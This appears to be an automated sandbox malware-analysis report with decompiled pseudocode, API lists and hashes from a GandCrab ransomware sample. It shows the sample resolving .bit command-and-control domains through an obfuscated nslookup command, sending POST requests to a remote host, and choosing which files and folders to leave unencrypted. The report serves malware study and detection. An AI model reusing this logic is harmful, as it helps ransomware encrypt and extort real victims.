                                    0x0f583fc4
                                    0x0f583fd6
                                    0x0f583fdf
                                    0x0f583fe7
                                    0x0f583fe7
                                    0x0f583dd5
                                    0x0f583fca
                                    0x0f583fd0

                                    APIs
                                      • Part of subcall function 0F583CF0: _memset.LIBCMT ref: 0F583D42
                                      • Part of subcall function 0F583CF0: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 0F583D66
                                      • Part of subcall function 0F583CF0: VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 0F583D6A
                                      • Part of subcall function 0F583CF0: VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 0F583D6E
                                      • Part of subcall function 0F583CF0: VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 0F583D95
                                      • Part of subcall function 0F583C70: AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0F583CA0
                                    • ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0F583E5D
                                    • wsprintfW.USER32 ref: 0F583F27
                                    • VirtualAlloc.KERNEL32(00000000,0000003D,00003000,00000040), ref: 0F583F3B
                                    • GetForegroundWindow.USER32 ref: 0F583F50
                                    • ShellExecuteExW.SHELL32(00000000), ref: 0F583FB1
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F583FC4
                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0F583FD6
                                    • CloseHandle.KERNEL32(?), ref: 0F583FDF
                                    • ExitProcess.KERNEL32 ref: 0F583FE7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ConditionMask$Virtual$AllocAllocateCloseEnvironmentExecuteExitExpandForegroundFreeHandleInfoInitializeObjectProcessShellSingleStringsVerifyVersionWaitWindow_memsetwsprintf
                                    • String ID: $ $"$"$%$%$2$\$\$a$a$c$c$c$d$e$e$e$i$l$m$m$n$o$p$r$r$r$s$s$s$t$t$w$y
                                    • API String ID: 561366689-3790645798
                                    • Opcode ID: 2d5441cc97f182e21739141cf843ecc5097a49877d9c44bad480227ee9ac69d9
                                    • Instruction ID: f084ac1c31428ad25061de51693550b6d875a6523ef945250586e709d6c8e080
                                    • Opcode Fuzzy Hash: 2d5441cc97f182e21739141cf843ecc5097a49877d9c44bad480227ee9ac69d9
                                    • Instruction Fuzzy Hash: DD5157B0008341EFE3208F10C548B9ABFF9BF84759F004A2DE6989A251D7FA915DCF92
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E0F585060(CHAR* __ecx, void* __edx, WCHAR* _a4) {
                                    				struct _SECURITY_ATTRIBUTES _v16;
                                    				short _v20;
                                    				intOrPtr _v24;
                                    				intOrPtr _v28;
                                    				intOrPtr _v32;
                                    				intOrPtr _v36;
                                    				intOrPtr _v40;
                                    				intOrPtr _v44;
                                    				intOrPtr _v48;
                                    				intOrPtr _v52;
                                    				intOrPtr _v56;
                                    				intOrPtr _v60;
                                    				intOrPtr _v64;
                                    				intOrPtr _v68;
                                    				char _v72;
                                    				short _v76;
                                    				intOrPtr _v80;
                                    				intOrPtr _v84;
                                    				intOrPtr _v88;
                                    				intOrPtr _v92;
                                    				intOrPtr _v96;
                                    				intOrPtr _v100;
                                    				intOrPtr _v104;
                                    				intOrPtr _v108;
                                    				intOrPtr _v112;
                                    				intOrPtr _v116;
                                    				intOrPtr _v120;
                                    				intOrPtr _v124;
                                    				char _v128;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				signed int _t43;
                                    				void* _t55;
                                    				CHAR* _t62;
                                    				void* _t64;
                                    
                                    				_v72 = 0x73006e;
                                    				_t55 = __edx;
                                    				_v20 = 0;
                                    				_t62 = __ecx;
                                    				_v76 = 0;
                                    				_v68 = 0x6f006c;
                                    				_t41 =  !=  ?  &_v128 :  &_v72;
                                    				_v64 = 0x6b006f;
                                    				_a4 =  !=  ?  &_v128 :  &_v72;
                                    				_v60 = 0x700075;
                                    				_v56 = 0x250020;
                                    				_v52 = 0x200053;
                                    				_v48 = 0x73006e;
                                    				_v44 = 0x2e0031;
                                    				_v40 = 0x690076;
                                    				_v36 = 0x6d0072;
                                    				_v32 = 0x630061;
                                    				_v28 = 0x2e0068;
                                    				_v24 = 0x750072;
                                    				_v128 = 0x73006e;
                                    				_v124 = 0x6f006c;
                                    				_v120 = 0x6b006f;
                                    				_v116 = 0x700075;
                                    				_v112 = 0x250020;
                                    				_v108 = 0x200053;
                                    				_v104 = 0x73006e;
                                    				_v100 = 0x2e0032;
                                    				_v96 = 0x690076;
                                    				_v92 = 0x6d0072;
                                    				_v88 = 0x630061;
                                    				_v84 = 0x2e0068;
                                    				_v80 = 0x750072;
                                    				_v16.nLength = 0xc;
                                    				_v16.bInheritHandle = 1;
                                    				_v16.lpSecurityDescriptor = 0;
                                    				_t43 = CreatePipe(0xf592a70, 0xf592a6c,  &_v16, 0);
                                    				if(_t43 != 0) {
                                    					_t43 = SetHandleInformation( *0xf592a70, 1, 0);
                                    					if(_t43 == 0) {
                                    						goto L1;
                                    					} else {
                                    						CreatePipe(0xf592a68, 0xf592a74,  &_v16, 0);
                                    						_t43 = SetHandleInformation( *0xf592a74, 1, 0);
                                    						if(_t43 == 0) {
                                    							goto L1;
                                    						} else {
                                    							_t64 = VirtualAlloc(0, 0x2800, 0x3000, 4);
                                    							if(_t64 == 0) {
                                    								lstrcpyA(_t62, "fabian wosar <3");
                                    								return 0;
                                    							} else {
                                    								wsprintfW(_t64, _a4, _t55);
                                    								E0F584E10(_t64);
                                    								E0F584FB0(_t55, _t62, _t55, _t62, _t64);
                                    								VirtualFree(_t64, 0, 0x8000);
                                    								return 0;
                                    							}
                                    						}
                                    					}
                                    				} else {
                                    					L1:
                                    					return _t43 | 0xffffffff;
                                    				}
                                    			}







































                                    0x0f58506d
                                    0x0f585078
                                    0x0f58507b
                                    0x0f58507f
                                    0x0f585081
                                    0x0f58508b
                                    0x0f585092
                                    0x0f585095
                                    0x0f58509e
                                    0x0f5850af
                                    0x0f5850b6
                                    0x0f5850bd
                                    0x0f5850c4
                                    0x0f5850cb
                                    0x0f5850d2
                                    0x0f5850d9
                                    0x0f5850e0
                                    0x0f5850e7
                                    0x0f5850ee
                                    0x0f5850f5
                                    0x0f5850fc
                                    0x0f585103
                                    0x0f58510a
                                    0x0f585111
                                    0x0f585118
                                    0x0f58511f
                                    0x0f585126
                                    0x0f58512d
                                    0x0f585134
                                    0x0f58513b
                                    0x0f585142
                                    0x0f585149
                                    0x0f585150
                                    0x0f585157
                                    0x0f58515e
                                    0x0f585165
                                    0x0f58516d
                                    0x0f585189
                                    0x0f58518d
                                    0x00000000
                                    0x0f58518f
                                    0x0f58519f
                                    0x0f5851af
                                    0x0f5851b3
                                    0x00000000
                                    0x0f5851b5
                                    0x0f5851c9
                                    0x0f5851cd
                                    0x0f58520a
                                    0x0f585218
                                    0x0f5851cf
                                    0x0f5851d4
                                    0x0f5851df
                                    0x0f5851e8
                                    0x0f5851f5
                                    0x0f585203
                                    0x0f585203
                                    0x0f5851cd
                                    0x0f5851b3
                                    0x0f58516f
                                    0x0f58516f
                                    0x0f585178
                                    0x0f585178

                                    APIs
                                    • CreatePipe.KERNEL32(0F592A70,0F592A6C,?,00000000,00000001,00000001,00000000), ref: 0F585165
                                    • SetHandleInformation.KERNEL32(00000001,00000000), ref: 0F585189
                                    • CreatePipe.KERNEL32(0F592A68,0F592A74,0000000C,00000000), ref: 0F58519F
                                    • SetHandleInformation.KERNEL32(00000001,00000000), ref: 0F5851AF
                                    • VirtualAlloc.KERNEL32(00000000,00002800,00003000,00000004), ref: 0F5851C3
                                    • wsprintfW.USER32 ref: 0F5851D4
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F5851F5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateHandleInformationPipeVirtual$AllocFreewsprintf
                                    • String ID: $ $1$2$S$S$a$a$fabian wosar <3$h$h$l$l$n$n$n$n$o$o$r$r$r$r$u$u$v$v
                                    • API String ID: 1490407255-3072057902
                                    • Opcode ID: 315b0cbed8d65d982c82a46fd35c39bbff48465a2df2d78d32241635c60fe22e
                                    • Instruction ID: 8da1a7b584a6d7daf77cc5e32a920ffe955128b43e4ad9c8c8c528cfe2bfa8c4
                                    • Opcode Fuzzy Hash: 315b0cbed8d65d982c82a46fd35c39bbff48465a2df2d78d32241635c60fe22e
                                    • Instruction Fuzzy Hash: A2415C71E40308ABEB109F94DD487EDBFB6FB04759F104129E904BA281D7FA455A8F94
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 92%
                                    			E0F5868F0(WCHAR* __ecx) {
                                    				int _t4;
                                    				signed int _t15;
                                    				void* _t19;
                                    				WCHAR* _t21;
                                    				short* _t25;
                                    				WCHAR* _t26;
                                    
                                    				_t21 = __ecx;
                                    				_t4 = lstrlenW(__ecx);
                                    				_t25 = _t21 - 2 + lstrlenW(_t21) * 2;
                                    				_t19 = _t4 - 1;
                                    				if(_t19 != 0) {
                                    					do {
                                    						_t25 = _t25 - 2;
                                    						_t19 = _t19 - 1;
                                    					} while ( *_t25 != 0x5c && _t19 != 0);
                                    				}
                                    				_t26 = _t25 + 2;
                                    				if(lstrcmpiW(_t26, L"desktop.ini") != 0) {
                                    					if(lstrcmpiW(_t26, L"autorun.inf") == 0 || lstrcmpiW(_t26, L"ntuser.dat") == 0 || lstrcmpiW(_t26, L"iconcache.db") == 0 || lstrcmpiW(_t26, L"bootsect.bak") == 0 || lstrcmpiW(_t26, L"boot.ini") == 0 || lstrcmpiW(_t26, L"ntuser.dat.log") == 0 || lstrcmpiW(_t26, L"thumbs.db") == 0) {
                                    						goto L5;
                                    					} else {
                                    						_t15 = lstrcmpiW(_t26, L"CRAB-DECRYPT.txt");
                                    						asm("sbb eax, eax");
                                    						return  ~_t15 + 1;
                                    					}
                                    				} else {
                                    					L5:
                                    					return 1;
                                    				}
                                    			}









                                    0x0f5868f9
                                    0x0f5868fc
                                    0x0f586906
                                    0x0f586909
                                    0x0f58690a
                                    0x0f586910
                                    0x0f586910
                                    0x0f586913
                                    0x0f586914
                                    0x0f586910
                                    0x0f586924
                                    0x0f586931
                                    0x0f586946
                                    0x00000000
                                    0x0f586990
                                    0x0f586996
                                    0x0f58699b
                                    0x0f5869a0
                                    0x0f5869a0
                                    0x0f586935
                                    0x0f586935
                                    0x0f58693b
                                    0x0f58693b

                                    APIs
                                    • lstrlenW.KERNEL32 ref: 0F5868FC
                                    • lstrlenW.KERNEL32 ref: 0F586901
                                    • lstrcmpiW.KERNEL32(?,desktop.ini), ref: 0F58692D
                                    • lstrcmpiW.KERNEL32(?,autorun.inf), ref: 0F586942
                                    • lstrcmpiW.KERNEL32(?,ntuser.dat), ref: 0F58694E
                                    • lstrcmpiW.KERNEL32(?,iconcache.db), ref: 0F58695A
                                    • lstrcmpiW.KERNEL32(?,bootsect.bak), ref: 0F586966
                                    • lstrcmpiW.KERNEL32(?,boot.ini), ref: 0F586972
                                    • lstrcmpiW.KERNEL32(?,ntuser.dat.log), ref: 0F58697E
                                    • lstrcmpiW.KERNEL32(?,thumbs.db), ref: 0F58698A
                                    • lstrcmpiW.KERNEL32(?,CRAB-DECRYPT.txt), ref: 0F586996
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcmpi$lstrlen
                                    • String ID: CRAB-DECRYPT.txt$autorun.inf$boot.ini$bootsect.bak$desktop.ini$iconcache.db$ntuser.dat$ntuser.dat.log$thumbs.db
                                    • API String ID: 203586893-3936223242
                                    • Opcode ID: 3b1154fdaae42e0514b1dc947d1580bd14000208d25efafdcf74f00b8058e6b7
                                    • Instruction ID: cd6451f024e767dec442da0242c67cd43a98bdaaad60d562859ccd19e01c8704
                                    • Opcode Fuzzy Hash: 3b1154fdaae42e0514b1dc947d1580bd14000208d25efafdcf74f00b8058e6b7
                                    • Instruction Fuzzy Hash: DB11CE627806A6755B20367DAD01EEF13CCBDD6F90385023AF904F2083EB99EE1384B5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 19%
                                    			E0F586780(void* __ecx) {
                                    				void* _t12;
                                    				intOrPtr* _t23;
                                    				void* _t51;
                                    				void* _t52;
                                    
                                    				_t52 = __ecx;
                                    				_t51 = VirtualAlloc(0, 0x201, 0x3000, 0x40);
                                    				if(E0F5881F0(_t52, L"\\ProgramData\\") != 0 || E0F5881F0(_t52, L"\\IETldCache\\") != 0 || E0F5881F0(_t52, L"\\Boot\\") != 0 || E0F5881F0(_t52, L"\\Program Files\\") != 0 || E0F5881F0(_t52, L"\\Tor Browser\\") != 0 || E0F5881F0(_t52, L"Ransomware") != 0 || E0F5881F0(_t52, L"\\All Users\\") != 0 || E0F5881F0(_t52, L"\\Local Settings\\") != 0) {
                                    					L18:
                                    					VirtualFree(_t51, 0, 0x8000);
                                    					return 0;
                                    				} else {
                                    					_t12 = E0F5881F0(_t52, L"\\Windows\\");
                                    					if(_t12 != 0) {
                                    						goto L18;
                                    					} else {
                                    						_t23 = __imp__SHGetSpecialFolderPathW;
                                    						_push(_t12);
                                    						_push(0x2a);
                                    						_push(_t51);
                                    						_push(_t12);
                                    						if( *_t23() == 0 || E0F5881F0(_t52, _t51) == 0) {
                                    							_push(0);
                                    							_push(0x2b);
                                    							_push(_t51);
                                    							_push(0);
                                    							if( *_t23() == 0 || E0F5881F0(_t52, _t51) == 0) {
                                    								_push(0);
                                    								_push(0x24);
                                    								_push(_t51);
                                    								_push(0);
                                    								if( *_t23() == 0 || E0F5881F0(_t52, _t51) == 0) {
                                    									_push(0);
                                    									_push(0x1c);
                                    									_push(_t51);
                                    									_push(0);
                                    									if( *_t23() == 0 || E0F5881F0(_t52, _t51) == 0) {
                                    										VirtualFree(_t51, 0, 0x8000);
                                    										return 1;
                                    									} else {
                                    										goto L18;
                                    									}
                                    								} else {
                                    									goto L18;
                                    								}
                                    							} else {
                                    								goto L18;
                                    							}
                                    						} else {
                                    							goto L18;
                                    						}
                                    					}
                                    				}
                                    			}







                                    0x0f586791
                                    0x0f5867a0
                                    0x0f5867a9
                                    0x0f5868d4
                                    0x0f5868dd
                                    0x0f5868e8
                                    0x0f58683b
                                    0x0f586842
                                    0x0f586849
                                    0x00000000
                                    0x0f58684f
                                    0x0f58684f
                                    0x0f586855
                                    0x0f586856
                                    0x0f586858
                                    0x0f586859
                                    0x0f58685e
                                    0x0f58686d
                                    0x0f58686f
                                    0x0f586871
                                    0x0f586872
                                    0x0f586878
                                    0x0f586887
                                    0x0f586889
                                    0x0f58688b
                                    0x0f58688c
                                    0x0f586892
                                    0x0f5868a1
                                    0x0f5868a3
                                    0x0f5868a5
                                    0x0f5868a6
                                    0x0f5868ac
                                    0x0f5868c8
                                    0x0f5868d3
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f58685e
                                    0x0f586849

                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,00000201,00003000,00000040,00000000,?,?,0F586E06,00000000,?,?), ref: 0F586793
                                    • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002A,00000000,?,?,0F586E06,00000000,?,?), ref: 0F58685A
                                    • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002B,00000000,?,?,0F586E06,00000000,?,?), ref: 0F586874
                                    • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000024,00000000,?,?,0F586E06,00000000,?,?), ref: 0F58688E
                                    • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,?,0F586E06,00000000,?,?), ref: 0F5868A8
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0F586E06,00000000,?,?), ref: 0F5868C8
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0F586E06,00000000,?,?), ref: 0F5868DD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FolderPathSpecial$Virtual$Free$Alloc
                                    • String ID: Ransomware$\All Users\$\Boot\$\IETldCache\$\Local Settings\$\Program Files\$\ProgramData\$\Tor Browser\$\Windows\
                                    • API String ID: 1363212851-3735464813
                                    • Opcode ID: 12619a8fe19732222dd493198db7ad9a0c3e6e1636b14e5343d4320dd0b6aeef
                                    • Instruction ID: 39386b1874398073fcb3d2cddaedfcb22535d72e04910fdab950d4ea3d1c13d8
                                    • Opcode Fuzzy Hash: 12619a8fe19732222dd493198db7ad9a0c3e6e1636b14e5343d4320dd0b6aeef
                                    • Instruction Fuzzy Hash: 1531E12074076222EA6432660D55B2F4BDAABD9E56F914035AA05FF2C2EF58DC0387A9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 86%
                                    			E0F585220() {
                                    				WCHAR* _v8;
                                    				intOrPtr _v12;
                                    				char _v16;
                                    				intOrPtr _v20;
                                    				char _v24;
                                    				char* _v28;
                                    				char* _v32;
                                    				char* _v36;
                                    				short _v40;
                                    				char _v56;
                                    				short _v60;
                                    				intOrPtr _v64;
                                    				char _v80;
                                    				WCHAR* _t26;
                                    				intOrPtr _t27;
                                    				long _t32;
                                    				WCHAR* _t37;
                                    				void* _t39;
                                    				signed int _t40;
                                    				signed int _t41;
                                    				signed int _t45;
                                    				void* _t48;
                                    				WCHAR* _t49;
                                    				void* _t52;
                                    				void* _t53;
                                    
                                    				asm("movdqa xmm0, [0xf590540]");
                                    				_v36 =  &_v56;
                                    				asm("movdqu [ebp-0x34], xmm0");
                                    				_v32 =  &_v80;
                                    				asm("movdqa xmm0, [0xf590520]");
                                    				_v40 = 0x74;
                                    				asm("movdqu [ebp-0x4c], xmm0");
                                    				_v64 = 0x69622e6d;
                                    				_v60 = 0x74;
                                    				_v24 = 0x62636467;
                                    				_v20 = 0x7469622e;
                                    				_v16 = 0;
                                    				_v28 =  &_v24;
                                    				_t26 = VirtualAlloc(0, 0x100, 0x3000, 4);
                                    				_t37 = _t26;
                                    				_v8 = _t37;
                                    				if(_t37 != 0) {
                                    					_t40 = 0;
                                    					_t48 = 1;
                                    					_t45 = 0;
                                    					while(1) {
                                    						_t27 =  *((intOrPtr*)(_t52 + _t45 * 4 - 0x20));
                                    						_t45 = _t45 + 1;
                                    						_v12 = _t27;
                                    						if(_t45 == 3) {
                                    							asm("sbb esi, esi");
                                    							_t48 =  ~(_t48 - 1) + 2;
                                    							_t45 = 0;
                                    						}
                                    						if(_t40 == 0xffffffff) {
                                    							Sleep(0x3e8);
                                    						}
                                    						_t39 = VirtualAlloc(0, 2 + lstrlenW(_t37) * 2, 0x3000, 4);
                                    						_t41 = _t39;
                                    						E0F585060(_t41, _v12, _t48);
                                    						_t53 = _t53 + 4;
                                    						_t32 = lstrcmpiA(_t39, "fabian wosar <3");
                                    						if(_t32 != 0) {
                                    							break;
                                    						}
                                    						VirtualFree(_t39, _t32, 0x8000);
                                    						_t37 = _v8;
                                    						_t40 = _t41 | 0xffffffff;
                                    					}
                                    					_t49 = _v8;
                                    					wsprintfW(_t49, L"%S", _t39);
                                    					VirtualFree(_t39, 0, 0x8000);
                                    					_t26 = _t49;
                                    				}
                                    				return _t26;
                                    			}




























                                    0x0f585226
                                    0x0f585236
                                    0x0f585241
                                    0x0f585246
                                    0x0f58524c
                                    0x0f58525b
                                    0x0f585261
                                    0x0f585266
                                    0x0f58526d
                                    0x0f585273
                                    0x0f58527a
                                    0x0f585281
                                    0x0f585285
                                    0x0f585288
                                    0x0f58528e
                                    0x0f585290
                                    0x0f585295
                                    0x0f58529b
                                    0x0f58529d
                                    0x0f5852a2
                                    0x0f5852a4
                                    0x0f5852a4
                                    0x0f5852a8
                                    0x0f5852a9
                                    0x0f5852af
                                    0x0f5852b4
                                    0x0f5852b6
                                    0x0f5852b9
                                    0x0f5852b9
                                    0x0f5852be
                                    0x0f5852c5
                                    0x0f5852c5
                                    0x0f5852ec
                                    0x0f5852ef
                                    0x0f5852f1
                                    0x0f5852f6
                                    0x0f5852ff
                                    0x0f585307
                                    0x00000000
                                    0x00000000
                                    0x0f585310
                                    0x0f585316
                                    0x0f585319
                                    0x0f585319
                                    0x0f58531e
                                    0x0f585328
                                    0x0f585339
                                    0x0f58533f
                                    0x0f58533f
                                    0x0f585347

                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,00000000,00000000,00000000), ref: 0F585288
                                    • Sleep.KERNEL32(000003E8), ref: 0F5852C5
                                    • lstrlenW.KERNEL32(00000000,00003000,00000004), ref: 0F5852D3
                                    • VirtualAlloc.KERNEL32(00000000,00000000), ref: 0F5852E3
                                    • lstrcmpiA.KERNEL32(00000000,fabian wosar <3), ref: 0F5852FF
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F585310
                                    • wsprintfW.USER32 ref: 0F585328
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F585339
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$AllocFree$Sleeplstrcmpilstrlenwsprintf
                                    • String ID: .bit$fabian wosar <3$gdcb$m.bi$t$t
                                    • API String ID: 2709691373-2847225850
                                    • Opcode ID: d1825d586f8624f3901625524a622172895362234e77ec1b0802ca379dd5396a
                                    • Instruction ID: a837bf1f86855d84c932208a36c83e99dd261ff7a176a6722088736031e62322
                                    • Opcode Fuzzy Hash: d1825d586f8624f3901625524a622172895362234e77ec1b0802ca379dd5396a
                                    • Instruction Fuzzy Hash: E431EB71E00309E7DB00DFA4DD85BEE7BB8FF44721F101125F605B6281EB745A068B94
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 22%
                                    			E0F5854F0(CHAR* __ecx, CHAR** __edx, intOrPtr _a8) {
                                    				void* _v8;
                                    				CHAR* _v12;
                                    				void* _v16;
                                    				CHAR** _v20;
                                    				void* _v24;
                                    				char _v28;
                                    				short _v124;
                                    				void* _t40;
                                    				CHAR* _t44;
                                    				CHAR* _t46;
                                    				void* _t47;
                                    				void* _t55;
                                    				void* _t56;
                                    				CHAR* _t58;
                                    				void* _t59;
                                    
                                    				_t46 = __ecx;
                                    				_v20 = __edx;
                                    				_v12 = __ecx;
                                    				E0F587E40( &_v28);
                                    				_v16 = E0F585220();
                                    				_t55 = 0x400 + lstrlenA(_t46) * 2;
                                    				_t7 = _t55 + 1; // 0x1
                                    				_t47 = VirtualAlloc(0, _t7, 0x3000, 0x40);
                                    				_v8 = VirtualAlloc(0, 0x32001, 0x3000, 0x40);
                                    				if(_t47 == 0) {
                                    					L3:
                                    					_t58 = 0;
                                    					L4:
                                    					lstrcatA(_t58, _v12);
                                    					asm("movdqu xmm0, [0xf58fb40]");
                                    					asm("movdqu [ebp-0x78], xmm0");
                                    					asm("movdqu xmm0, [0xf58fb50]");
                                    					asm("movdqu [ebp-0x68], xmm0");
                                    					asm("movdqu xmm0, [0xf58fb60]");
                                    					asm("movdqu [ebp-0x58], xmm0");
                                    					asm("movdqu xmm0, [0xf58fb70]");
                                    					asm("movdqu [ebp-0x48], xmm0");
                                    					asm("movdqu xmm0, [0xf58fb80]");
                                    					asm("movdqu [ebp-0x38], xmm0");
                                    					asm("movdqu xmm0, [0xf58fb90]");
                                    					asm("movdqu [ebp-0x28], xmm0");
                                    					lstrlenA(_t58);
                                    					_t56 = 0;
                                    					_push(lstrlenW( &_v124));
                                    					_push( &_v124);
                                    					_push(L"POST");
                                    					_push(0x31fff);
                                    					_push(_v8);
                                    					_push(lstrlenA(_t58));
                                    					_push(_t58);
                                    					_t59 = _v16;
                                    					_push(L"popkadurak");
                                    					_push(_t59);
                                    					if(E0F588050( &_v28) != 0) {
                                    						_t56 = 1;
                                    						if(_a8 != 0) {
                                    							_v12 = 0;
                                    							if(E0F5853D0(_v8,  &_v12) == 0) {
                                    								_t56 = 0;
                                    							} else {
                                    								_t44 = _v12;
                                    								if(_t44 != 0) {
                                    									 *_v20 = _t44;
                                    								}
                                    							}
                                    						}
                                    					}
                                    					VirtualFree(_t59, 0, 0x8000);
                                    					VirtualFree(_v8, 0, 0x8000);
                                    					VirtualFree(_t47, 0, 0x8000);
                                    					_t40 = _v24;
                                    					if(_t40 != 0) {
                                    						InternetCloseHandle(_t40);
                                    					}
                                    					return _t56;
                                    				}
                                    				_t9 = _t55 + 1; // 0x1
                                    				if(_t55 >= _t9) {
                                    					goto L3;
                                    				} else {
                                    					_t58 = _t47;
                                    					goto L4;
                                    				}
                                    			}


















                                    0x0f5854f8
                                    0x0f5854fa
                                    0x0f585501
                                    0x0f585504
                                    0x0f58550f
                                    0x0f585525
                                    0x0f58552c
                                    0x0f585542
                                    0x0f585546
                                    0x0f58554b
                                    0x0f585558
                                    0x0f585558
                                    0x0f58555a
                                    0x0f58555e
                                    0x0f585564
                                    0x0f58556d
                                    0x0f585572
                                    0x0f58557a
                                    0x0f58557f
                                    0x0f585587
                                    0x0f58558c
                                    0x0f585594
                                    0x0f585599
                                    0x0f5855a1
                                    0x0f5855a6
                                    0x0f5855ae
                                    0x0f5855b3
                                    0x0f5855bc
                                    0x0f5855c5
                                    0x0f5855c9
                                    0x0f5855ca
                                    0x0f5855d2
                                    0x0f5855d7
                                    0x0f5855e1
                                    0x0f5855e2
                                    0x0f5855e3
                                    0x0f5855e9
                                    0x0f5855ee
                                    0x0f5855f6
                                    0x0f5855fc
                                    0x0f585601
                                    0x0f585609
                                    0x0f585617
                                    0x0f585627
                                    0x0f585619
                                    0x0f585619
                                    0x0f58561e
                                    0x0f585623
                                    0x0f585623
                                    0x0f58561e
                                    0x0f585617
                                    0x0f585601
                                    0x0f585637
                                    0x0f585643
                                    0x0f58564d
                                    0x0f58564f
                                    0x0f585654
                                    0x0f585657
                                    0x0f585657
                                    0x0f585665
                                    0x0f585665
                                    0x0f58554d
                                    0x0f585552
                                    0x00000000
                                    0x0f585554
                                    0x0f585554
                                    0x00000000
                                    0x0f585554

                                    APIs
